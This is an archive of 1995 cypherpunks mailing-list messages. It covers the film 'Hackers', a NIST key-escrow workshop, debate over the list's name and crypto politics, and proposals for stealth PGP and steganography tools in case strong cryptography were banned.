> the title "hackers" for this movie rather than steal it. It's not
> very original. Besides, the content of your book has very little
> to do with this movie. The movie would be more appropriately
> titled "crackers" or "phreakers"
> 
> -Ray
>  
> 
> 

Or maybe Bruce Sterling should object.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Sun, 17 Sep 95 17:18:40 PDT
To: cypherpunks@toad.com
Subject: Re: CYPHERPUNK considered harmful
In-Reply-To: <Pine.SUN.3.91.950917184519.17849D-100000@polaris.mindport.net>
Message-ID: <199509180014.RAA00341@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> On Sun, 17 Sep 1995, Black Unicorn wrote:
> 
> So if you are so in touch with Joe Sixpack, what does he think?  Do you 
> have some evidence to suggest that there is any widespread awareness of 
> the issues among Joe and Jane?  Surveys?  Studies?  Anything?
> 
> Go out on the street and ask 10 random people.  Hell, ask 10 
> intellectuals not in the computer science field.  I think your level of 
> disillusion will approach mine, and if not, then I do not give your 
> powers of observation much credit.
> 
Actually, I think it's even worse than that.

I dropped by the weekly 'meeting' of the Cal Poly SLO Computer Club (OK,
these are the locally notorious slo.punks, and the meeting is more of a
social get together than anything) last Monday night.  I was interested
in getting people's reactions to having a large number of people's 
anon.penet IDs publicly posted.  What I found was kind of scary.

No one was aware of the existence of any other remailers than anon.penet.

Everyone assumed that the University is logging all mail to anon.penet, and
no one particularly cared.

One woman asked me why she should use PGP when it could be so quickly broken.
Turns out (I am NOT making this up) she didn't know the difference between
PGP and ROT_13!

Knowledge of security was limited to the technical details of setting up
systems such as Kerberos and firewalls and not using your SSN for a password.
No one had any idea of the algorithms involved, or which ones are truly
secure and which ones can be easily broken.  Etc.

These are all undergraduates in the process of getting BSCS degrees.

-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NSCEE@aurora.nscee.edu
Date: Sun, 17 Sep 95 17:16:34 PDT
To: cypherpunks@toad.com
Subject: Re: FAX Encryption Software
In-Reply-To: <43hun9$n2b@news1.deltanet.com>
Message-ID: <9509180016.AA26906@aurora.nscee.edu>
MIME-Version: 1.0
Content-Type: text/plain



FYI: This was posted to a slew of Usenet newsgroups. Unless I've
missed something, which "CRYPTO-STRONG" package has ever been
"licensed" by the "U.S. Department of Commerce"? 

Does anybody have more info on this product or the good folks
behind it? 

=====================================================================
Originally posted by: clav@deltanet.com

>ANYONE FOR A CRYPTO-STRONG, YET EASY TO USE FAX/EMAIL SECURITY 
>SOFTWARE PACKAGE FOR BUSINESS OR OTHER USE???
>
>Aliroo Ltd. has developed a Windows, eye-to-eye fax/email 
>encryption package called PrivaSoft.
>
>Unlike any previously devised system, this method protects, with 
>only 4 mouse clicks, fax and email transmissions in electronic 
>and even paper form - FROM THE TIME YOU CREATE A MESSAGE UNTIL IT 
>IS READ - NOT JUST WHEN YOUR FAX IS BEING TRANSMITTED. 
>
>You can encrypt a message, and then fax or email it (via plain 
>old standard fax machine or fax modem), print it to paper or save 
>to a disk file.
>
>It is fully licensed, without restriction for export, by the U.S. 
>Department of Commerce. NO PGP WORRIES.
>
>Email me for a free copy which will be sent to you via email or 
>snail mail post. It is fully functional (not crippleware) and 
>enables you to try our system out before purchase with 8 free 
>page scrambles. It retails for $130 per installed computer. 
>Looking for end users and distributors.
>
>Thanks,
>David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 17 Sep 95 15:39:01 PDT
To: Greg Broiles <greg@ideath.goldenbear.com>
Subject: Re: CYPHERPUNK considered harmful.
In-Reply-To: <199509162015.AA03916@ideath.goldenbear.com>
Message-ID: <Pine.SUN.3.91.950917183137.17849B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 16 Sep 1995, Greg Broiles wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Black Unicorn writes:
> > Some months ago I called for advanced stego and stealth PGP as well as 
> > larger keys in the event we all had to go "into the crypto closet" for a 
> > time.
> 
> > I call for them again.
> 
> I know of three ways to get software:
> 
> 1. Write it yourself.

I've admitted before I program as well as a carp.  (No, not Mr. Carp)

> 2. Pay someone else to write it.

I don't think that e.g., a stealth PGP would demand much of a fee, or 
that such a fee would make many of the people involved in the various
intellectual rights of the program happy.

I might add that I don't want the software for myself, I want it for the 
effect it will have on potential legislation/enforcement.

If some other 'punks want to get together and fund such projects, I will 
participate.  However, putting the burden of financing this venture 
(which will have no immediate economic return, as I will support no 
venture which does not result in fully public software) entirely on my 
shoulders just because I happen to believe it will soon be necessary to 
maintain any strong crypto ability, is unrealistic, and I believe you 
know it.

> 3. Find software someone else wrote that meets your needs.

I'm working on 3, I don't believe it exists.

> If (3) isn't working, perhaps you should try (1) or (2). 
> 
> (I've been "calling for" a big house with a hot tub for years now.
> Still no progress. I'll let you know if it works out.)


Cute, but that's about all.


> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMFswPX3YhjZY3fMNAQHatwP/ZJKuNEDRPdCldyvshGkG/w/io+37zx3m
> DyJ4h1+OicxYCtKbolXYVcX8C4d1j7hXY2sesepcDvYYyy+butdQ+/2tw3u0FW1j
> WpfCGURpypBVb5T7QlL21Qv39cBIu9mJxkasPkQSeSnrC24eGtoItmZzrIRZgJyj
> Dj2FOIfxiFY=
> =5DwJ
> -----END PGP SIGNATURE-----
> 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 19 Sep 95 10:02:12 PDT
To: hallam@w3.org
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <9509170429.AA05221@zorch.w3.org>
Message-ID: <Pine.D-G.3.91.950917183710.11501B-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Sep 1995 hallam@w3.org wrote:

> 
> >I saw "Hackers" yesterday. It's not bad and its political sensibility is
> >very cyberpunk. The ad campaign even uses the tag line, "Their only crime
> >is curiosity." 
> 
> I know companies who have spent millions cleaning up after a hacker breakin. 
> I've been up at two in the morning trying to stop a person with known mental 
> problems breaking into a site with some very dangerous computer controlled 
> machinery. I've dealt with people trying to get rich quick by defrauding others. 
> I've met some real evil bastards who simply want to ruin as many other people's 
> lives as they possibly can, including people that thought they were their 
> friends.
> 
> To me teenagers who break into computer systems are not funny at all, it's like 
> joyriding, it's funny until someone gets hurt. I know people who have got hurt 
> real bad.
> 
> I like having privacy, part of the cost of that privacy is respecting the 
> privacy of others.
> 
> 	Phill
> 

Phill obviously presents one point of view, vigorously and well.  What do 
the rest of you think about a teen who, say, busts into a .edu site, 
plays with the files, and ultimately brings the system down entirely for 
36 hours?  Fun and games?  Send him to his room, sans modem? Prosecute 
him?  Have a TLA hire him???

Not an easy answer for me for "mere trespass," but as damage mounts, it 
becomes easier. 

I'll try to post later tonight on my prior key escrow question.

EBD



Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 17 Sep 95 15:40:51 PDT
To: "S. Keeling" <keelings@wu1.wl.aecl.ca>
Subject: Re: WAS_tem (fwd)
In-Reply-To: <9509162012.AA29482@wu1.wl.aecl.ca>
Message-ID: <Pine.SUN.3.91.950917184021.17849C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 16 Sep 1995, S. Keeling wrote:

> Incoming from Rev. Ben:
> > 
> > On Thu, 14 Sep 1995, James A. Donald wrote:
> > 
> > > If you draw a picture using paintbrush of an underage person engaging
> > > in sexual conduct, you are in violation of this proposed legislation.
> > 
> > Doesn't that directly contradict the stated purpose of existing child 
> [snip]
> > 
> > Do the lawyers on the list want to pipe up?

The current child pornography laws are entirely misguided and poorly written.

> -- 
> 
>  "Remember, obsolescence (Win95) isn't an accident;  it's an art form!" 
>    keelings@wu1.wl.aecl.ca       s. keeling,   aecl - whiteshell labs
> 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 17 Sep 95 15:46:06 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: "Attachments"
In-Reply-To: <ac81e3df200210046fa3@[205.199.118.202]>
Message-ID: <9509172245.AA20150@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim May the Luddite ;) writes:
[in response to Michael Shields' application/pgp message]
> Why do people keep sending "attachments"?
> 
> This was just a text article, and not an application (program), so why was
> it included as an "attachment"?

It's useful for those of us with MIME-enabled mailers, appropriately
configured -- PGP is automatically launched to check the signature.

It's not useful for others on the list, AFAIK.

Pretty please, let's not have another MIME war; I think we drove Amanda
Walker away permanently with the last one.

Followups directed somewhere other than cypherpunks@toad.com.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bryan <sbryan@maroon.tc.umn.edu> (Steve Bryan)
Date: Sun, 17 Sep 95 16:47:09 PDT
To: Steven Levy <pcw@access.digex.net>
Subject: Re: "Hackers"-- brief review and anecdote...
Message-ID: <v02130501ac814d566452@[204.221.10.130]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:36 pm 9/16/95, Steven Levy wrote:

>>I saw "Hackers" yesterday. It's not bad and its political sensibility is
>>very cyberpunk. The ad campaign even uses the tag line, "Their only crime
>>is curiosity." 
>
>It may not be a crime, but it's not nice to steal a title.

I suppose this means that when "Hackers" comes out on video there's no
point in looking for a cameo appearance of the author of the identically
named book?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Sun, 17 Sep 95 15:55:14 PDT
To: cypherpunks@toad.com
Subject: Friday's NIST Key Escrow FIPS Workshop
Message-ID: <Pine.SUN.3.91.950917182201.10484D-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



I went to the NIST "Developing Key Escrow Encryption Standards Workshop" 
held in Gaithersburg, MD on Sept. 15, 1995.  It turns out I know the guy
who was running the conference so I knew I couldn't miss it...and I knew I
had to wear my Cypherpunks t-shirt to show the flag (and it stood out, as
there were few without suits there). I got to meet Dorothy Denning for the
first time.  I was mentioning how government key-escrow doesn't sound too
bad to some in the libertarian/cypherpunk world, say for instance to
ensure FOIA requests are not encrypted away.  She said that would never be
a problem, just getting the government to give you FOIA documents in the
first place is the problem. 

In a nutshell, this was a conference to begin work on a FIPS for software 
key encryption escrow.  Industry people there felt that a FIPS would be a 
great way to standardize key escrow for data recovery.  However, except 
for one guy at IBM who said they tap employees' phones a lot, most industry 
people felt that it was not needed for tapping their real-time 
communications.  There was a lot of talk from government people about the 
need for Law Enforcement to get access to encrypted real-time 
communication between government employees.  This, to say the least, 
squicked many attendees, and there seemed to be much tension between the 
sides on that issue.

I asked a couple of industry people and privacy advocates the question "Am
I just paranoid, or is this FIPS a trial balloon for mandated civilian
key escrow?"  I got many "yes" answers.  I also heard the occasional "this
sounds like son-of-clipper" comments in the breakout groups. 

One noteworthy point is that RSA sent in a position paper to try to get 
the Digital Signature Standard replaced by RSA signatures for inclusion 
in key escrow FIPS due to its "virtual non-availability in commercial 
products," and noted that the US Govt. has free use of RSA sigs.

Another noteworthy point is that NIST made clear that the key escrow FIPS 
should _not_ involve SECRET algorithms.  

The Workshop consisted of a discussion of goals and objectives by Ray
Kammer (Deputy Director, NIST) and some initial thoughts on standards
development by Miles Smid (NIST).  Here is the gist of the overhead
slides: 

The Goals of the workshop were based on the August 17 announcement by the
Administration to allow for exportability of 64-bit software key escrow
encryption, plans to allow Federal agencies to use Escrowed Encryption
Standards compliant hardware devices for data communications, and the
development of a FIPS for key escrow, implementable in software.  This
escrow FIPS would be used by Federal agencies in conjunction with
FIPS-approved encryption techniques.  This workshop was held to help 
begin the FIPS development.  The workshop goals included 1) Providing 
input to the govt. on drafting a software key escrow encryption standard; 
2) Helping govt. to identify additional policy and technical issues that 
need to be addressed and 3) providing the govt. with thoughts on drafting 
and follow-up.

The FIPS process involves developing the draft FIPS, a 90 day comment 
period, then addressing comments, and then it goes to the Secretary of 
Commerce for signature, and becomes effective six months after the 
signature.  

The purpose of the New Escrow FIPS is to foster a wider use of escrow 
technology...this means: no requirement for SECRET algorithms, software 
and hardware implementations, and exportability.  It also will provide a 
government validation of escrow systems meeting the 
standard...theoretically allowing for security, integrity, and availability.

Threats examined included compromise (unauthorized disclosure of keys and 
data recovery), and denial of service (modification or loss of keys, use 
of bogus recovery fields, and improper system operation).

The FIPS will provide common formats and procedures which will facilitate 
data recovery and lower cost.  Applicability of the FIPS will include the 
US Govt. and contractors.  Applications include both stored and 
transmitted data.  Encryption algorithms must be FIPS approved.  And 
finally desirable features include: auditing, configuration control, 
backup capability, and efficiency.

The questions asked to the breakout groups included:

1) Is a standard interface for the release of keys desirable?
2) What documentation is required?
3) How will operational procedures be developed?
4) How will conformance be validated?
5) Will security be evaluated?  If so, under what criteria and by whom?
6) How will configuration control be maintained?
7) Are new FIPS-approved algorithms necessary?
8) Should escrowing be built into the Public Key Infrastructure?
9) Is a standard escrow system identification field needed?
10) Is split knowledge required?
11) Do systems which permit data to be encrypted for both storage and 
transmission need to provide for both kinds of escrow?
12) Does the government require special features (2-hour access, 
continuous real-time decryption, etc.)?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 17 Sep 95 16:21:04 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: CYPHERPUNK considered harmful.
In-Reply-To: <Pine.SUN.3.91.950917183137.17849B-100000@polaris.mindport.net>
Message-ID: <199509172320.TAA28220@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Black Unicorn writes:
> > > Some months ago I called for advanced stego and stealth PGP as well as 
> > > larger keys in the event we all had to go "into the crypto closet" for a 
> > > time.
> > 
> > > I call for them again.

> On Sat, 16 Sep 1995, Greg Broiles wrote:
> > (I've been "calling for" a big house with a hot tub for years now.
> > Still no progress. I'll let you know if it works out.)

Black Unicorn writes:
> Cute, but that's about all.

I think the problem is that those of us in a position to build them
don't really believe that they will solve the problem and thus are
spending our time on other matters.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 17 Sep 95 16:23:21 PDT
To: "David C. Lambert" <dcl@panix.com>
Subject: Re: CYPHERPUNK considered harmful
In-Reply-To: <199509171657.MAA26446@panix.com>
Message-ID: <Pine.SUN.3.91.950917184519.17849D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 17 Sep 1995, David C. Lambert wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Black Unicorn <unicorn@polaris.mindport.net> wrote:
> > On Fri, 15 Sep 1995, David C. Lambert wrote:
> >
> > > BTW, I'm not for changing the name of the list, but I do see the logic
> > > in a more establishment-friendly name to use when lobbying the public.
> > 
> > Distrubute [sic] watered down cypherpunk "teachings" in more benign forms which
> > hide their true (Ohhh! Scary!) potential in an effort to make them commonly 
> > acceptable to joe sixpack.
> 
> I believe you misstate the point that people are trying to make.
> 
> I haven't seen anyone advocating the "watering down" of any so-called
> "teachings" to "hide" any "true potential".  The only thing that people
> have mentioned is that some of the less clueful out there have a knee
> jerk response to the name "cypherpunk".  That's all.

I don't believe you can have one without the other.  Tell me someone who 
is sensitive enough to be offended by the term "cypherpunk" won't be 
alarmed at concepts like crypto-anarchy.


> 
> > Can't we all see what road this leads down?
> 
> No.  Please enlighten us.
>

When you begin compromising to meet the public sentiment you end up 
aiming for the middle.  "He who builds on the people builds on mud."  I 
believe this especially true in the United States.  The general 
population has no tolerance/time/interest in the deeper issues involved 
here, and are much more apt to bow to the "law and order" arguments made 
by the various political entities here.  These are emotional arguments to 
which Joe Sixpack is particularly open.  Enter the four horsemen.

I believe working to recruit "the people" and lobby "the leaders" to 
embrace the ramification of free and strong crypto is a losing game.  My 
money in information futures is going into "yes" certificates on the 
question of "Unescrowed Strong Crypto Banned in U.S. by 2000."


> > At the risk of politicizing the issue, I wouldn't be the first to call this 
> > "left-speak" or "term-sanitizing."
> 
> And this matters because...?
>


The fact that you need this question answered does more to rebuke your 
position than I ever could.

 
> > Really the core issue is that the citizens of their respective nations 
> > need to either:
> > 
> > 1>  See cryptography for the important individual rights issue that it
> > is and latch on to the basic desire for free and unmonitored commerce and 
> > exchange without censorship or observation.
> > 
> > or
> > 
> > 2>  Decide that they are not interested in the issues because these 
> > issues are too radical, or simply because their own political ideas
> > fall left (or statist) of this spectrum.
> 
> What exactly is it that you feel "the citizens of their respective
> nations" are doing right now, if not this?

Be real.  What percentage of [insert nation here]'s citizens would be 
able to discuss strong encryption with anything more than a comic book 
understanding?

i.e., the answer to your question is "mostly nothing."

> > in the end I 
> > don't care if every joe sixpack on the planet uses real crypto, just so
> > long as those I am to conduct commerce (of data or goods) with do.
> 
> If this is the case, then I'm at a loss to understand how you fail to see
> the merit in a "term-sanitizing", as you put it, in order to make the use
> of strong crypto desired and required by Joe Sixpack.

Your error is in assuming Joe Sixpack desires or thinks he requires strong 
crypto.

> How do you expect
> the legality of strong crypto to survive unless Joe and his friends exert
> political pressure to keep it alive?

I don't expect its legality to survive in the United States, nor do I 
expect it to survive despite "political pressure" (the nature of which 
you conveniently do not identify) and finally, I don't expect Joe 
Sixpack, and his friends to exert any (undefined) political pressure- or care.

If people want to try and organize a crypto awareness program, fine.
If people want to try and organize a crypto propaganda program, count me out.

If you don't understand the difference, you need to study history and 
political science.

If Joe Sixpack can't deal with the core, unsanitized ramifications of 
strong crypto, Joe Sixpack isn't ready to have strong crypto.  This is, 
in my view, realism, and intellectual evolution in action.  If strong 
crypto is the advantage I suspect it will be, then those nations which 
use it will endow its citizens with those significant advantages, 
hopefully to the disadvantage of the banning nations.  With any luck, 
this will result in the eventual lack of world/market influence of 
crypto-ignorant Joe Sixpacks.  This in my view is "a good thing."
I would like the United States to be pro-crypto, but I'm not sure I give 
the country and its current political system as a whole that much credit.

> Isn't it obvious that unless this
> happens, that strong (unescrowed) crypto is on the path to being outlawed
> (at least in the US, and several other countries)?
> 
> > The final judgement will be in the advantage of velocity and security of 
> > transactions and the wealth that this "allocates" to those wise enough to 
> > adopt crypto exchange systems.  Evolution in action.  If this makes me 
> > elitist, so be it.
> 
> Elitist or not, this is beside the point.

No, it is exactly the point.

> People are bringing up political
> and rhetorical concerns because they feel that political and persuasive
> methods are required *right now* in order to preserve the *legality* of 
> strong crypto.

And I believe them a waste of time because I feel that political and 
persuasive methods are useless *right now* or in the *foreseeable future*.

The only thing that will stop this legislation will be a sudden awakening 
of the American People to freedom of speech in the face of an offered and 
vague promise of "security."  (Read: Good Luck)

The FBI is screaming that strong crypto is nasty stuff to the Executive.  
Certainly the intelligence agencies are doing the same.
The Executive is going to support if not outright push through a key 
forfeiture bill, and about all I can see standing in the way will be 
cost- which in this bill is going to be small.

> I only care about whether Joe Sixpack wants strong crypto
> because if I can't persuade him that he does, he won't help me keep it
> legal in my country of residence.

So if you are so in touch with Joe Sixpack, what does he think?  Do you 
have some evidence to suggest that there is any widespread awareness of 
the issues among Joe and Jane?  Surveys?  Studies?  Anything?

Go out on the street and ask 10 random people.  Hell, ask 10 
intellectuals not in the computer science field.  I think your level of 
disillusion will approach mine, and if not, then I do not give your 
powers of observation much credit.

>  Once its legality seems safe(r) from
> attack, he can go on using rot13 for all I care.

I think you have a long wait.

Part of the entire issue here is securing your own privacy rather than 
letting the government do it for you.  By waiting for someone to TELL 
YOU that you are now ALLOWED to secure your own privacy, why are you any 
better than he who doesn't use strong crypto?  Instead you should, while 
perhaps allocating some effort to political concerns, be working to 
propagate crypto systems which are untraceable, do not bear the 
recipient's key identifier in each message, and otherwise able to endure a 
crypto "Dark Age" which I see right around the corner here.

In other words:

Secure it yourself.  Privacy comes to you only if you secure it 
yourself.  If you believe that political action is the way to do this, be 
my guest- I happen to think you are wasting your time.  Time will judge 
the winner of this debate in any event.  I hope I am wrong, I expect I am 
not.

> 
> David C. Lambert
> dcl@panix.com
> (finger for PGP public key)
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
[...]
> -----END PGP SIGNATURE-----
> 
> 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 17 Sep 95 16:25:53 PDT
To: cypherpunks@toad.com
Subject: Re: CYPHERPUNK considered harmful.
Message-ID: <199509172325.TAA22254@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by unicorn@polaris.mindport.net (Black 
Unicorn) on Sun, 17 Sep  6:39 PM


>If some other 'punks want to get together and fund such 
>projects, I will participate.  However, putting the 
>burden of financing this venture (which will have no 
>immediate economic return, as I will support no venture 
>which does not result in fully public software) 


What are the prospects of privacy-enhancing programming funded 
by contributors for non-commercial, non-governmental, "fully 
public software?" I would tithe, modestly but durably, to such 
work if I believed the promise. They call me Ishmael Sixpack.


John Gilmore's (and others'?) underwriting toad is impressive. 
Along with the voluntary (?) effort of Hugh Daniels (and 
others, I don't know how toad survives).


What else might be done cypherpunk-wise if material resources 
were available? And under what conditions and arrangements? The 
discussion of Mixmaster commercialization is instructive. And 
Julf's and the other remailers' survivability and longevity in 
the face of attacks.


How could the contributions be made without contaminating the 
product? No joke.


Or, are only individually initiated and self-funded programs 
trustworthy, when all is said and done? And no planned program 
as rewarding as the eclectic irregulated.


And bartering and bickering and rending and mending the only 
reputable method of exchange of the tumultuous souk.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 17 Sep 95 16:37:02 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: planning for life during the crypto night (was Re: CYPHERPUNK considered harmful.)
In-Reply-To: <20045.9509171928@exe.dcs.exeter.ac.uk>
Message-ID: <Pine.SUN.3.91.950917192456.17849E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information

On Sun, 17 Sep 1995 aba@atlas.ex.ac.uk wrote:

> 
> Black Unicorn <unicorn@polaris.mindport.net> writes:
> >
> > 3. Unescrowed crypto banned, with advanced stego, panic passwords, 
> > stealth PGP, incorporated remailers all across international borders 
> > making offenders impossible to identify or catch.
> > 
> > [...] I believe the goal is to propagate crypto far enough to at
> > least have a salient "underground" participants.
> > 
> > Some months ago I called for advanced stego and stealth PGP as well
> > as larger keys in the event we all had to go "into the crypto
> > closet" for a time.
> > 
> > I call for them again.
> 
> Guess you're saying that a future underground cypherpunk group is
> going to need tools to continue if the US plummets into cryptographic
> darkness.  And you'd like to see these tools available now, as it will
> be difficult to distribute, and set up if the big ban is already on
> us.  A pre-emptive safety precaution in the event that it happens.

Precisely.  Thank you.

> 
> So what threat model do you envisage tools being needed to withstand?
>

Traffic analysis, jurisdiction, detection of encrypted data in stego'd 
files.

I believe the basic problem will be one of avoiding detection and the 
ability to piggyback harmless looking files on "approved" encryption.

In the event your encrypted message were detected, it would be nice if it 
didn't announce its intended destination via a public key header.

I also believe that excessively large keys should be incorporated 
(2048/4096 bit RSA and 256 bit IDEA like encryption perhaps) to extend the
likely useful life of cyphers which will be difficult to distribute later.

I also would like to see applications which permit the user to select 
from among a few types of encryption, in the event one is found to be broken.

> A couple of the things you list are realisable with little effort, one
> is a PGP with large keys, I am using a doctored to go to 16k keys

[description of availability]

> Adding stealth features to PGP, or even as standalone, aren't hard
> either.  I've been trying to add Hal's improved stealth algorithm to
> Henry Hastur's stealth program.  It's basically finished, except for
> the problem that I am unsure about the security of the construct:

Excellent!

> So that's big key PGP, and stealth PGP.  I'm presuming most people
> figure 128 bit IDEA is suitably unassailable,

I'm pretty confident in it, but I would like to see some others about.

> What are views about creating Yet Another version of PGP.  I've read a
> few discussions of this kind of thing in the past on alt.security.pgp,
> and most people were against it.  But I think some useful things could
> come out of it.


I think one of the big hold ups is the wait for PGP 3.0

> 
> The other problem is working with pgp2.x when there is a version 3.0
> being worked on, not sure what stage 3.0 is at, any coding.. perhaps
> if a stealth capable pgp2.x was worked on, and a few features
> demonstrated, the 3.0 folks would be willing to take a look at it to
> evaluate the features for possible version 3.0 inclusion.

Exactly.

> Good stego tools are the other main problem.

I concur.

> 
> My understanding is that all of the stego programs to date do it by
> just ripping out the LSB of an audio or graphic image, and replacing
> that with the bits from a message with a stealthed message.
>

As I understood the current implementation, stego is fairly easy to sniff 
out.  Am I mistaken in this?

> Sending masses of pictures around is kind of suspicious tho, I mean
> several a day, each freshly scanned from what?  I guess if video
> conferencing gets here, it would be fun to add the stego into that
> noisy stream, same for internet phone.

Perhaps, but hardly as suspicious as sending naked random data.  I think 
given hard to sniff stego, and the nationwide bandwidth, this is a non-issue.

> Text stego, with bits hidden in the entropy of english text seems a
> harder objective, but a useful one.

Indeed.

> I'm presuming that plausible deniability, and facilities for anonymity
> are essentials.  How does one go about doing that?  Using newsgroups
> to carry on a two level communication might be a good way of
> maintaining plausible deniability.  Either a stego interface to
> remailers in other countries, so that the stego gateway to remailers
> scans its newspool, decrypts messages addressed to it, and forwards
> that off to the anon remailers.  The outcome could be a further text
> or graphics stegoed message for posting to a suitably high noise news
> group.  The recipient is also scanning his news spool for stego
> messages addressed to him.
> 
> Sounds feasible.  Perhaps a proof of concept would be easy to knock
> up, if a place holder is inserted for the 'good text stego' program
> should go.  There was a 'texto' posted a while ago which did something
> suitable.
> 
> Adam

I believe all these to be in everyone's best interest.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Sun, 17 Sep 95 16:30:31 PDT
To: Steven Levy <steven@echonyc.com>
Subject: Re: "Hackers"-- brief review and anecdote...
Message-ID: <ac81f7431f02100449e3@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain


>>I saw "Hackers" yesterday. It's not bad and its political sensibility is
>>very cyberpunk. The ad campaign even uses the tag line, "Their only crime
>>is curiosity."
>
>It may not be a crime, but it's not nice to steal a title.

Well, what do you think of my latest predicament. My first book, "Agents
Unleashed" will be retitled "Agents At Large" because SAMS, a division of
Viacom, considers any title ending with the word "unleashed" to be an
infringement of their tradedress. They came up with enough legal
mumbo-jumbo about trademark to scare my publisher into changing it.

-Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Sun, 17 Sep 95 16:39:14 PDT
To: perry@piermont.com
Subject: Re: "Hackers"-- brief review and anecdote...
Message-ID: <ac82633800021004becb@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain


in" -- this doesn't mean madonna stole it, does it?
>
>I'm reminded of the time a few years a go that there were two films in
>release simultaneously named "Black Rain", and, most oddly, both took
>place in Japan.
>
>Perry

This is not as odd as you might think once you realize that the rain that
fell after the atomic bombing was black.

-Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sun, 17 Sep 95 20:24:13 PDT
To: hughes@remailer.net, gnu, cypherpunks
Subject: Central Banking for the 21st Century -- Thurs 28Sep, San Fran
Message-ID: <9509180324.AA29978@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


The Pacific Research Forum, a local libertarian economics group, is
sponsoring a talk by Dr. Jerry L. Jordan, president of the Federal
Reserve Bank of Cleveland and Dr. Donald T. Brash, governor of the
Reserve Bank of New Zealand, with moderator Dr. William S. Haraf,
director of public policy for BofA.

The forum is 3:30-5PM at the Banker's Club, 555 California St, 51st
floor, SF.  The reception is 5PM-6PM.  It costs $25; RSVP to Cindy
Sparks at +1 415 989 0833.

"Central banks were originally intended to bring price stability to a
paper-based bank payments system.  But what will be the proper role of
a central bank in the rapidly approaching era of digital money?  What
happens to monetary policy, supervision and regulation, as well as
financial services such as clearing checks, when electronically-
initiated debits and credits become the transaction of choice?"

..."Dr. Jordan predicts that ... the proliferation of digital money will
provide new challenges for central banks laboring to provide stable money."

I'll probably see you there...
--
John Gilmore                                    gnu@toad.com  --  gnu@eff.org
        Don't introduce that Tsutomu to your girlfriend.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Sun, 17 Sep 95 13:28:04 PDT
To: cypherpunks@toad.com
Subject: cypherpunks as a newsgroup
Message-ID: <m0suQJV-000HYvC@yage.tembel.org>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Sun, 17 Sep 95 12:28:43 PDT
To: unicorn@polaris.mindport.net
Subject: planning for life during the crypto night (was Re: CYPHERPUNK considered harmful.)
